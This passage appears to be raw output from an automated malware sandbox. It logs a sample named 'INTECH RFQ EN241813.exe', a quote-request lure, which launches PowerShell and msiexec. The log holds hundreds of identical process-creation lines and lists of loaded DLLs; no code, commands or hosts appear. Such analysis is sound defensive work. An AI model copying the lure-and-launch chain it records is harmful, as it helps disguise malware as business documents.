              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
